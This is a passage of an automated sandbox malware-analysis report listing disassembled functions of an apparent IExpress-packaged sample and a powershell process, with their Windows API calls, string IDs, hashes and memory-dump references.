                                                          • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                          • Instruction Fuzzy Hash: 90517061A0C6DA46FFB94F25A5113B96B91EB8EBF0F4881B1CA8E46785CF2CD445C720
                                                          Function 00007FF6975A3F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A3F95
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A4018
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                            • Part of subcall function 00007FF6975A7700: GetLastError.KERNEL32 ref: 00007FF6975A7704
                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A403E
                                                          • LocalFree.KERNEL32(?,?,?,?,?,00007FF6975A3139), ref: 00007FF6975A409F
                                                            • Part of subcall function 00007FF6975A7AC8: FindResourceA.KERNEL32 ref: 00007FF6975A7AF2
                                                            • Part of subcall function 00007FF6975A7AC8: LoadResource.KERNEL32 ref: 00007FF6975A7B09
                                                            • Part of subcall function 00007FF6975A7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF6975A7B3F
                                                            • Part of subcall function 00007FF6975A7AC8: FreeResource.KERNEL32 ref: 00007FF6975A7B51
                                                          • LocalFree.KERNEL32 ref: 00007FF6975A4078
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                          • Instruction ID: 771cb9290c0f519d6e654929b0705ffac3df26fe7a2bd19121b1ee20d617088f
                                                          • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                          • Instruction Fuzzy Hash: FA317072A2960386FBB8AF20E41177A7660FF847E5F4041B5D90E86694EF7DE4058720
                                                          Function 00007FF6975A772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF6975A114C: _vsnprintf.MSVCRT ref: 00007FF6975A1189
                                                          • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7763
                                                          • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7772
                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A77B8
                                                          • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A77EC
                                                          • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6975A606F), ref: 00007FF6975A7805
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                          • Instruction ID: 0e1d1b256b5921fd1a1f980540bf45a53abf3e0e3e91d6ba0f8f6cb62f077abc
                                                          • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                          • Instruction Fuzzy Hash: 7F316631A08B42C6FBA88B25A400179BBA1FFC9BE0F558675DA5E877A4CF3CE445C710
                                                          Function 00007FF6975A5050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                          • String ID:
                                                          • API String ID: 3370778649-0
                                                          • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                          • Instruction ID: dd2ac727c8c757ad3baa2be656b9da3e8100276814659475fa84e3eedc1a48f8
                                                          • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                          • Instruction Fuzzy Hash: EF113D71B08B9187EBA85B62A44407DBAA0FB4EFE1F4991B8DD4E87758DF3CD4418710
                                                          Function 00007FF6975A2244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                          • String ID: wininit.ini
                                                          • API String ID: 3273605193-4206010578
                                                          • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                          • Instruction ID: 23e9a219ca0923b28d03fd20ab5f3f8274895953d30e413ef30d75924e0b1b17
                                                          • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                          • Instruction Fuzzy Hash: 83114F32B04A8187EB649B21E8542FAB7A1FBCD764F858171DA4E87768DF3CD509CA10
                                                          Function 00007FF6975A3840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Window$Text$DesktopDialogForegroundItem
                                                          • String ID: 52352352352
                                                          • API String ID: 761066910-1175956450
                                                          • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                          • Instruction ID: e6457a2170a5ba83a9f7b3e513c8e629f879673301b344f6e9d2544f57bd8bf1
                                                          • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                          • Instruction Fuzzy Hash: 78111270D0974386FBFC5B55A4092B86A51FF8EBE5F5491B0C90E86399DF3CA444C620
                                                          Function 00007FF6975A494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5078
                                                            • Part of subcall function 00007FF6975A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A5089
                                                            • Part of subcall function 00007FF6975A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50AF
                                                            • Part of subcall function 00007FF6975A5050: LoadResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50C0
                                                            • Part of subcall function 00007FF6975A5050: LockResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50CF
                                                            • Part of subcall function 00007FF6975A5050: memcpy_s.MSVCRT ref: 00007FF6975A50EE
                                                            • Part of subcall function 00007FF6975A5050: FreeResource.KERNEL32(?,?,00000000,00007FF6975A2E43), ref: 00007FF6975A50FD
                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6975A3388), ref: 00007FF6975A4975
                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF6975A3388), ref: 00007FF6975A4A11
                                                            • Part of subcall function 00007FF6975A4DCC: LoadStringA.USER32 ref: 00007FF6975A4E60
                                                            • Part of subcall function 00007FF6975A4DCC: MessageBoxA.USER32 ref: 00007FF6975A4EA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$@$FINISHMSG
                                                          • API String ID: 3507850446-4126004490
                                                          • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                          • Instruction ID: bb7e209c6d42e351731133ce24d49659659c9e5df026e3a82b9ea0e99514bbac
                                                          • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                          • Instruction Fuzzy Hash: 6311D572A0835287FBB89B24F41077A77A1FB897E4F449175DA4E86B89DF3CD4048B14
                                                          Function 00007FF6975A79F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AttributesFile
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                          • API String ID: 438848745-1955609190
                                                          • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                          • Instruction ID: aebec5291449a85345f06bfc76990e81add2ec166b7e8db35752b5fa235cde3c
                                                          • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                          • Instruction Fuzzy Hash: 2811A531A18A8296EFB58B10E4503F977A0FF897A4F8446B1C65D826A5DF3DD609C720
                                                          Function 00007FF6975A1500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                          • String ID:
                                                          • API String ID: 1273765764-0
                                                          • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                          • Instruction ID: 68d35b0466e7da40de4d87d09f1df925d07528765d2b47df8349ba5f61159c21
                                                          • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                          • Instruction Fuzzy Hash: 28116061A08A8586EEB85B54F4053B9A7A0FB8DBF4F444271CA5E863D9CF3CD045CB10
                                                          Function 00007FF6975A3BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                          • String ID: 52352352352
                                                          • API String ID: 2312377310-1175956450
                                                          • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                          • Instruction ID: f92323142209792acdbb6a3a1dcb3a5227cf8dad8a6d3e60f121e1de5cf538e7
                                                          • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                          • Instruction Fuzzy Hash: 0BA18D32E1928386FBF88B11944467A66A4FF547E8F5501BAE91DC3284DF3DE845CB20
                                                          Function 00007FF6975A78B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleWrite
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 1065093856-388467436
                                                          • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                          • Instruction ID: fbdd95352103298d2d09cc878b723b5a1cdacdc8bdd065492e3ca5f2b8a718ac
                                                          • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                          • Instruction Fuzzy Hash: 593194727187818AEBA58F20E4407BAB7A0FB897E4F444675DA9D87794CF7CD408CB20
                                                          Function 00007FF6975A5C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *MEMCAB
                                                          • API String ID: 0-3211172518
                                                          • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                          • Instruction ID: f9e614ddf58a1e5ae812ae9ecffb041ca456e8316dc686563c48a8c65cdf9ab4
                                                          • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                          • Instruction Fuzzy Hash: 1E316BB1A18B42C5EBA88B20E4487B977A0FB447E0F844276D96D82794EF3CE549C760
                                                          Function 00007FF6975A8470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                          • String ID:
                                                          • API String ID: 140117192-0
                                                          • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                          • Instruction ID: b7e265b2a2bf2c568951307b56df0b191dd5a04aee44c5e32c1a63df69b39a20
                                                          • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                          • Instruction Fuzzy Hash: 3E41EA35A08B0585EBA8CB18F89036977A8FB897E4F904176D98DC3764DF7DE444C760
                                                          Function 00007FF6975A7C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Char$Prev$Next
                                                          • String ID:
                                                          • API String ID: 3260447230-0
                                                          • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                          • Instruction ID: 01c30de697aed2ac5a9a217dafcc9f8dcdfc0e76103fa28e2c471b4409e54e9b
                                                          • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                          • Instruction Fuzzy Hash: CE118A62A0869185FFA94B11B514279AF91EB8DFF1F4986B0DA5F47794CF3CD4408710
                                                          Function 00007FF6975A8648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                          • String ID:
                                                          • API String ID: 140117192-0
                                                          • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                          • Instruction ID: 742938c7e32b7dd5fdd53b4a92f13843b114e57f284c4a27039f02d2700f3f84
                                                          • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                          • Instruction Fuzzy Hash: 9221D535908B46C5EBA8CB44F8803A977B8FB89BA4F900176DA8D83764DF7DE454C760
                                                          Function 00007FF6975A3B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2189733892.00007FF6975A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6975A0000, based on PE: true
                                                          • Associated: 00000000.00000002.2189634670.00007FF6975A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189803032.00007FF6975A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2189871342.00007FF6975AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2191133097.00007FF6975AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff6975a0000_OTO2wVGgkl.jbxd
                                                          Similarity
                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                          • String ID:
                                                          • API String ID: 2776232527-0
                                                          • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                          • Instruction ID: 3c6e3ef0f15f597e822fe14035dcff7acf800b3215cf0eac475c45ce8e10e1d5
                                                          • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                          • Instruction Fuzzy Hash: 42118632A18786C7FBF48F20E444B7ABA91FF99799F409170DA4A82984DF3CD448CB10

                                                          Executed Functions

                                                          Function 00007FFD345437B5 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2677026903.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_7ffd34540000_powershell.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction ID: beb75e083c9451410778db7af2e0200886696d0147cd5d5cddc61f0df38a43ea
                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                          • Instruction Fuzzy Hash: D801A77020CB0C4FDB44EF0CE051AB6B7E0FB95320F10056DE58AC3661D636E882CB41

                                                          Execution Graph

                                                          Execution Coverage:14.6%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:5
                                                          Total number of Limit Nodes:0
                                                          execution_graph 9543 4f40170 9544 4f40190 9543->9544 9547 28df330 9544->9547 9548 28df373 CoInitializeSecurity 9547->9548 9549 28df3b6 9548->9549

                                                          Executed Functions

                                                          Function 028DF330 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 91 28df330-28df3b4 CoInitializeSecurity 93 28df3bd-28df3d1 91->93 94 28df3b6-28df3bc 91->94 94->93
                                                          APIs
                                                          • CoInitializeSecurity.COMBASE(?,?,?,?,00000000,?,?,?,?), ref: 028DF3A7
